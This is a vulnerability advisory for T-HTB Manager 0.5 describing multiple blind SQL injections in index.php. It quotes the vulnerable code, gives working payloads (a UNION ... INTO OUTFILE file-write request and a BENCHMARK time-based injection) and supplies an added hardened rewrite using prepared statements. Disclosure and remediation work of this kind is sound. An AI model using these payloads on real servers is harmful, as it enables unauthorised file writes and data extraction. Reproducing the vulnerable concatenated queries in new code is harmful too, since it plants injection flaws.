T-HTB Manager Multiple Blind SQL Injection

2009.10.04
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

******** Salvatore "drosophila" Fresta ********

[+] Application: T-HTB Manager
[+] Version: 0.5
[+] Website: http://sourceforge.net/apps/mediawiki/t-htbmanager/index.php?title=Main_Page
[+] Bugs: [A] Multiple Blind SQL Injection
[+] Exploitation: Remote
[+] Date: 10 Sep 2009
[+] Discovered by: Salvatore Fresta aka drosophila
[+] Author: Salvatore Fresta aka drosophila
[+] E-mail: drosophilaxxx [at] gmail.com

***************************************************

[+] Menu

1) Bugs
2) Code
3) Fix

***************************************************

[+] Bugs

- [A] Multiple Blind SQL Injection

[-] Risk: medium
[-] Requisites: magic_quotes_gpc = off
[-] File affected: index.php

None of the request parameters used by this script are sanitized before being concatenated into SQL queries, but the query results are never echoed back to the client, so the injection is blind. Both payloads below need a literal single quote to break out of the string literal, which is why magic_quotes_gpc must be off. Relevant excerpts from index.php, shown as in the vulnerable release:

...
case 'delete_category':
    $id = $_GET['id'];
    $id_interfaces = $_GET['id_interfaces'];
    if($id>0) {
        $query = "SELECT rgt, lft FROM ".$table_name." WHERE id='" . $id . "'";
        $db_query = mysql_query($query);
...
case 'update_category':
    $name = $_POST['name'];
    $id = $_POST['id'];
    $rate = $_POST['rate'];
    $ceil = $_POST['ceil'];
    $burst = $_POST['burst'];
    $prio = $_POST['prio'];
    $monitor = $_POST['monitor'];
    if(strlen($name)>0 && $id>0) {
        $nodelft = $_POST['nodelft'];
        $lft = $_POST['lft'];
        $rgt = $_POST['rgt'];
        $query = "UPDATE ".$table_name." set name='" . $name . "' , lft='" . $lft . "' , rgt = '" . $rgt . "', rate= '" . $rate . "', ceil = '" . $ceil . "', burst = '" . $burst . "', prio = '" . $prio . "', monitor = '" . $monitor . "' WHERE id='" . $id . "'";
...

And many others.

Note that the $id>0 checks are not a defence: PHP of that era compares a string with an integer by converting the string using its leading digits, so a value such as 1' UNION ... passes the check while the complete string is still concatenated into the query.

***************************************************

[+] Code

- [A] Multiple Blind SQL Injection

This is a blind SQL injection, and the application's database holds nothing particularly sensitive such as usernames or passwords. However, the injection can be used to write arbitrary files on the server when the MySQL account has the FILE privilege and the target directory is writable by the mysqld process (INTO OUTFILE also refuses to overwrite an existing file).

The SELECT in delete_category returns two columns, so a two-column UNION is appended; the application supplies the closing quote:

http://site/path/index.php?action=delete_category&id=1' UNION ALL SELECT NULL,'evil code' INTO OUTFILE '/tmp/file.php

For update_category, send the following as the body of a POST request. The injected WHERE clause ends the UPDATE early and the # (%23) comments out the remainder of the original query. The condition ASCII(CHAR(97)) = 97 is always true, so the response is delayed by BENCHMARK; replacing it with an arbitrary boolean condition turns the delay into a time-based oracle:

action=update_category&id=9999&name=blabla' WHERE 1=0 OR IF(ASCII(CHAR(97)) = 97,BENCHMARK(10000000000,null),null)%23

***************************************************

[+] Fix

No fix.

***************************************************
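The advisory ships no fix. The following hardened rewrite of the two affected cases is an added example written for this page, not code from the T-HTB Manager project. It assumes a mysqli connection in $mysqli (the original uses the legacy mysql_* API), that the action name arrives in the request as in the payloads above, that $table_name is one of a fixed set of category tables the application itself defines (placeholder names are used here, since a table name cannot be bound as a parameter and must be checked against an allow-list instead), and that id, lft and rgt are integer columns while the remaining columns are bound as strings. The column types are an assumption; a bound string parameter is safe regardless of the column type because the value is never parsed as SQL.

```php
<?php
// Added example: hardened delete_category / update_category handlers.
// Assumes an existing mysqli connection in $mysqli and that the
// application defines its own list of legitimate category tables.
// All names below that are not in the advisory are placeholders.

// Table names cannot be bound with placeholders, so allow-list them.
$allowedTables = ['categories_eth0', 'categories_eth1']; // placeholder names

function checkedTable(string $table_name, array $allowed): string {
    if (!in_array($table_name, $allowed, true)) {
        throw new InvalidArgumentException('unknown table');
    }
    return '`' . $table_name . '`';
}

// Validate integer parameters with filter_var instead of "$id > 0", which
// silently accepts "1' UNION ..." because PHP compares using the leading
// digits of the string.
function requireInt($value): int {
    $n = filter_var($value, FILTER_VALIDATE_INT, ['options' => ['min_range' => 0]]);
    if ($n === false) {
        throw new InvalidArgumentException('expected a non-negative integer');
    }
    return $n;
}

function preparedOrFail(mysqli $db, string $sql): mysqli_stmt {
    $stmt = $db->prepare($sql);
    if ($stmt === false) {
        throw new RuntimeException('prepare failed: ' . $db->error);
    }
    return $stmt;
}

switch ($_REQUEST['action'] ?? '') {

case 'delete_category':
    $id            = requireInt($_GET['id'] ?? '');
    $id_interfaces = requireInt($_GET['id_interfaces'] ?? '');
    if ($id > 0) {
        $sql  = 'SELECT rgt, lft FROM ' . checkedTable($table_name, $allowedTables)
              . ' WHERE id = ?';
        $stmt = preparedOrFail($mysqli, $sql);
        $stmt->bind_param('i', $id);          // bound, never concatenated
        $stmt->execute();
        $stmt->bind_result($rgt, $lft);
        $found = $stmt->fetch();
        $stmt->close();
        // ... continue with $rgt / $lft as the original handler does
    }
    break;

case 'update_category':
    $name    = (string)($_POST['name'] ?? '');
    $id      = requireInt($_POST['id'] ?? '');
    $rate    = (string)($_POST['rate'] ?? '');
    $ceil    = (string)($_POST['ceil'] ?? '');
    $burst   = (string)($_POST['burst'] ?? '');
    $prio    = (string)($_POST['prio'] ?? '');
    $monitor = (string)($_POST['monitor'] ?? '');
    if (strlen($name) > 0 && $id > 0) {
        $lft = requireInt($_POST['lft'] ?? '');
        $rgt = requireInt($_POST['rgt'] ?? '');
        $sql  = 'UPDATE ' . checkedTable($table_name, $allowedTables)
              . ' SET name = ?, lft = ?, rgt = ?, rate = ?, ceil = ?, burst = ?,'
              . ' prio = ?, monitor = ? WHERE id = ?';
        $stmt = preparedOrFail($mysqli, $sql);
        // Types: s = string, i = integer; every user value travels as a
        // parameter, so a quote or a WHERE clause in $name is just data.
        $stmt->bind_param('siisssssi',
            $name, $lft, $rgt, $rate, $ceil, $burst, $prio, $monitor, $id);
        $stmt->execute();
        $stmt->close();
    }
    break;
}
```

With the values bound as parameters, neither payload from the Code section reaches the parser as SQL: the UNION ... INTO OUTFILE string fails the integer check, and the name payload is stored verbatim as a category name. Relying on magic_quotes_gpc (the advisory's only listed requisite) is not a substitute; it was removed in PHP 5.4 and never covered numeric contexts such as WHERE id=$id without quotes.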

References:

http://xforce.iss.net/xforce/xfdb/53145
http://www.securityfocus.com/archive/1/archive/1/506386/100/0/threaded
http://www.milw0rm.com/exploits/9637


Copyright 2024, cxsecurity.com
